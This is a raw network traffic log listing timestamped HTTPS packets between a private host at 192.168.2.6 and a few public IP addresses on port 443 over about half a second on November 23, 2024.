Nov 23, 2024 07:09:23.422238111 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.422245979 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.422276974 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.422529936 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.433310986 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.433432102 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.433445930 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.433624983 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.462547064 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.462718964 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.462733984 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.467010975 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.487375021 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.487492085 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.487499952 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.487605095 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.507915020 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.508049011 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.508058071 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.511301994 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.513526917 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.513550997 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.514051914 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.514065981 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.515136003 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.518651962 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.518728018 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.519207001 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.519521952 CET	49749	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.519551992 CET	443	49749	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.522222996 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.522274971 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.522383928 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.522383928 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.522397041 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.522679090 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.546453953 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.546892881 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.548470974 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.548520088 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.548588991 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.551821947 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.551856041 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.551970005 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.551970005 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.551986933 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.552073956 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.561168909 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.561209917 CET	443	49730	20.223.36.55	192.168.2.6
Nov 23, 2024 07:09:23.561252117 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.561546087 CET	49730	443	192.168.2.6	20.223.36.55
Nov 23, 2024 07:09:23.563515902 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.563535929 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.563719988 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.563730001 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.563810110 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.578938961 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.578990936 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.579068899 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.579082966 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.579108000 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.579191923 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.593595028 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.593625069 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.593743086 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.593743086 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.593750954 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.593807936 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.597384930 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.597404957 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.597592115 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.597603083 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.597728968 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.600123882 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.600169897 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.600202084 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.600208044 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.600250006 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.600250006 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.612281084 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.612301111 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.612386942 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.612396955 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.612512112 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.619035006 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.619059086 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.619198084 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.619209051 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.619807959 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.623477936 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.623503923 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.623624086 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.623632908 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.623641968 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.623734951 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.635395050 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.635607958 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.635622978 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.635699987 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.648922920 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.648946047 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.649038076 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.649045944 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.649169922 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.651773930 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.651889086 CET	443	49736	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.651927948 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.651937008 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.651978016 CET	443	49736	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.652242899 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.652242899 CET	49736	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.652343035 CET	49736	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.652343035 CET	49736	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.652359009 CET	443	49736	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.652375937 CET	443	49736	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.653413057 CET	443	49735	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.653476954 CET	443	49735	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.653616905 CET	49735	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.653747082 CET	49735	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.653770924 CET	443	49735	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.653800011 CET	49735	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.653808117 CET	443	49735	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.655045986 CET	49750	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.655081987 CET	443	49750	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.655388117 CET	49750	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.655388117 CET	49750	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.655420065 CET	443	49750	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.656006098 CET	49751	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.656030893 CET	443	49751	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.659055948 CET	49751	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.659332991 CET	49751	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.659347057 CET	443	49751	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.662020922 CET	443	49738	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.662103891 CET	443	49738	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.663125992 CET	49738	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.663125992 CET	49738	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.663197994 CET	49738	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.663203955 CET	443	49738	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.663674116 CET	443	49737	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.663737059 CET	443	49737	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.667448997 CET	49737	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.669183016 CET	443	49739	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.669250011 CET	443	49739	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.669714928 CET	49739	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.671333075 CET	49737	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.671350002 CET	443	49737	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.671390057 CET	49737	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.671396017 CET	443	49737	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.671514988 CET	49739	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.671514988 CET	49739	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.671520948 CET	443	49739	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.671528101 CET	443	49739	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.672348976 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.672480106 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.672488928 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.672686100 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.676863909 CET	49753	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.676899910 CET	443	49753	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.676945925 CET	49752	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.676964998 CET	443	49752	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.677033901 CET	49753	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.677087069 CET	49752	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.677192926 CET	49752	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.677207947 CET	443	49752	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.678559065 CET	49753	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.678577900 CET	443	49753	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.678580999 CET	49754	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.678587914 CET	443	49754	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.678663969 CET	49754	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.678809881 CET	49754	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:23.678822994 CET	443	49754	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:23.687658072 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.687748909 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.687757015 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.687853098 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.701646090 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.701699972 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.701725960 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.701734066 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.701785088 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.701785088 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.703113079 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.703283072 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.703290939 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.703361034 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.716129065 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.716216087 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.716234922 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.716312885 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.723125935 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.723150969 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.723186970 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.723195076 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.723299026 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.723452091 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.723516941 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.723526955 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.723582983 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.733896971 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.733942986 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.733968019 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.733975887 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.734004974 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.734026909 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.739415884 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.739434958 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.739475012 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.739485025 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.739533901 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.748929024 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.748977900 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.748994112 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.749002934 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.749034882 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.749054909 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.750498056 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.750557899 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.750574112 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.750586987 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.750627995 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.750627995 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.753319025 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.753335953 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.753416061 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.753416061 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.753423929 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.753460884 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.763076067 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.763117075 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.763144016 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.763151884 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.763220072 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.766190052 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.766212940 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.766252041 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.766256094 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.766284943 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.766305923 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.766360998 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.766381979 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.766475916 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.766475916 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.766484976 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.766522884 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.774876118 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.774921894 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.774956942 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.774965048 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.774997950 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.775064945 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.778733969 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.778753042 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.778817892 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.778825998 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.778847933 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.778904915 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.780249119 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.780271053 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.780322075 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.780328035 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.780353069 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.780375004 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.787406921 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.787456036 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.787492990 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.787503958 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.787549973 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.787570953 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.791812897 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.791831970 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.791896105 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.791903973 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.791928053 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.791960001 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.793279886 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.793299913 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.793364048 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.793370962 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.793387890 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.793415070 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.805478096 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.805500031 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.805553913 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.805560112 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.805598021 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.805615902 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.818509102 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.818531036 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.818583965 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.818588972 CET	443	49733	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.818635941 CET	49733	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.843291044 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.843399048 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.843426943 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.843585968 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.856338978 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.856410980 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.856420994 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.856508970 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.867126942 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.867196083 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.867203951 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.867263079 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.877816916 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.877885103 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.877893925 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.877945900 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.891819954 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.891882896 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.891891003 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.891937971 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.897512913 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.897536993 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.897617102 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.897618055 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.897629976 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.897665024 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.902393103 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.902460098 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.902468920 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.902515888 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.906234980 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.906301022 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.906325102 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.906333923 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.906379938 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.906379938 CET	49734	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.907236099 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.907260895 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.907294989 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.907304049 CET	443	49732	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.907326937 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.907346964 CET	49732	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.913093090 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.913160086 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.913167953 CET	443	49731	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.913208008 CET	49731	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:23.915976048 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.916024923 CET	443	49734	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:23.916069031 CET	49734	443	192.168.2.6	150.171.27.10
